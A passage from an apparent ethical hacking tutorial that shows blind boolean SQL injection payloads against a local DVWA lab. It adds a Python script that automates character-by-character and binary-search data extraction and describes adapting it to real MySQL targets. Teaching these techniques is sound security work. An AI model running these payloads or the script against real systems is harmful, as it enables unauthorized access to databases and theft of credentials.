Ethical Hacking and Penetration Testing Guide



Syntax
http://localhost/index.php?support=yes' and (SELECT 1 from dvwa.users limit 0,1)=1--+
Guessing Columns in the Table
Now that we have found that the users table exists inside the database, the next step is to determine the columns in the table, for which we will use the following query:
Syntax
http://localhost/index.php?support=yes' and (SELECT substring(concat(1,username),1,1) from dvwa.users limit 0,1)=1--+
Replace the word “username” with the name of the column you are trying to guess. Prepending 1 with concat makes the first character of the result “1” for any non-NULL value, so the comparison is true whenever the column exists; if the column does not exist, the whole query fails instead. Let's see what happens when we execute this query.


The application returns an error indicating that the column “username” does not exist in the 
“users” table present in the dvwa database. Let’s now try injecting a column that is present in the 
table.
Syntax
http://localhost/index.php?support=yes' and (SELECT substring(concat(1,user),1,1) from dvwa.users limit 0,1)=1--+
The page now returns a true response, so the column user exists. In a similar manner, we can guess other columns.
Extracting Data from Columns
Now comes the hard part: recovering the contents of the column user. We need to do it one character at a time. Let's take a look at the command:
Syntax
http://localhost/index.php?support=yes' and (select mid(user,1,1) from dvwa.users limit 0,1)='a'--+
This query asks the database whether the first character of the first user value is “a”. The trailing --+ is a URL-encoded “-- ” (the + decodes to the space MySQL requires after --), which comments out the rest of the original statement, including its closing quote.
We get a true response, meaning that it is indeed “a”. From the previous UNION-based SQL injection demonstration, we already know that the value is admin; however, you can see how time-consuming this is when we enumerate one character at a time, since each position costs one request per candidate character. Scanners use a faster technique: instead of asking whether the character equals a particular value, they ask whether its ASCII value is greater than a chosen threshold and halve the candidate range with every answer (a binary search), so each 7-bit ASCII character takes only about seven requests, whatever the character set.
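As an added example (not code from the book), the following Python stands in for the DVWA target with an in-memory SQLite database and runs the three steps above against it: the column-existence check, the one-character-at-a-time equality guessing described on this page, and the greater-than/binary-search variant the scanners use, counting how many requests each needs. The vulnerable query shape, the faq table and the user rows are constructed assumptions (the book never shows index.php). SQLite spells MySQL's mid(), ascii() and concat() as substr(), unicode() and ||, so the payloads use those names, but their structure is the same as the book's.

```python
import sqlite3
import string


def build_db():
    """Constructed stand-in for the DVWA database; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS dvwa")  # so dvwa.users resolves
    conn.execute("CREATE TABLE dvwa.users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO dvwa.users VALUES (?, ?, ?)",
        [(1, "admin", "constructed-hash-1"), (2, "gordonb", "constructed-hash-2")],
    )
    conn.execute("CREATE TABLE faq (support TEXT, answer TEXT)")  # what index.php reads
    conn.execute("INSERT INTO faq VALUES ('yes', 'Support is available')")
    return conn


class VulnerableApp:
    """Plays http://localhost/index.php?support=...  The query is built by
    string concatenation (an assumption: the book never shows the PHP)."""

    def __init__(self):
        self.conn = build_db()
        self.requests = 0  # how many "HTTP requests" an extraction technique needs

    def page_is_true(self, support):
        """Boolean oracle: True when the injected WHERE clause still matches a row.
        A SQL error (e.g. a non-existent column) counts as False, like the
        error page the book describes."""
        self.requests += 1
        sql = "SELECT answer FROM faq WHERE support='" + support + "'"
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False


# "--+" in the URL decodes to "-- ": the comment swallows the closing quote.
COMMENT = "-- "


def column_exists(app, column, row=0):
    """Book's column guess: concat(1,col) in MySQL is 1 || col here, so the first
    character is always '1' when the column exists; a bad name errors instead."""
    payload = ("yes' and (select substr(1 || %s, 1, 1) from dvwa.users limit %d,1)='1'%s"
               % (column, row, COMMENT))
    return app.page_is_true(payload)


CHARSET = string.ascii_lowercase + string.digits + string.ascii_uppercase + "_-@."


def extract_linear(app, row=0, max_len=32):
    """The page's method: "is character N equal to X?" for each candidate X
    (MySQL mid() is SQLite substr())."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = ("yes' and (select substr(user,%d,1) from dvwa.users limit %d,1)='%s'%s"
                       % (pos, row, ch, COMMENT))
            if app.page_is_true(payload):
                result += ch
                break
        else:
            return result  # no candidate matched: we ran off the end of the value
    return result


def extract_binary(app, row=0, max_len=32):
    """The scanners' method: "is ascii(character N) > T?" (MySQL ascii() is
    SQLite unicode()), halving the candidate range on every request."""
    result = ""
    for pos in range(1, max_len + 1):
        def greater_than(threshold):
            payload = ("yes' and (select unicode(substr(user,%d,1)) from dvwa.users "
                       "limit %d,1)>%d%s" % (pos, row, threshold, COMMENT))
            return app.page_is_true(payload)

        if not greater_than(0):  # unicode('') is NULL: past the end of the value
            return result
        lo, hi = 0, 127  # invariant: lo < code point <= hi (7-bit ASCII)
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if greater_than(mid):
                lo = mid
            else:
                hi = mid
        result += chr(hi)  # 7 requests per character, whatever the charset
    return result


if __name__ == "__main__":
    for fn in (extract_linear, extract_binary):
        app = VulnerableApp()
        print(fn.__name__, repr(fn(app)), "in", app.requests, "requests")
```

Against the constructed rows, the equality method needs one request per candidate character tried (and a full pass over the character set to notice the end of the value), while the threshold method needs eight per character regardless of the alphabet, which is why scanners prefer it. Against a real MySQL target the same functions work with mid(), ascii() and concat() substituted into the payload strings and page_is_true replaced by an HTTP request that checks for the true-page marker.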

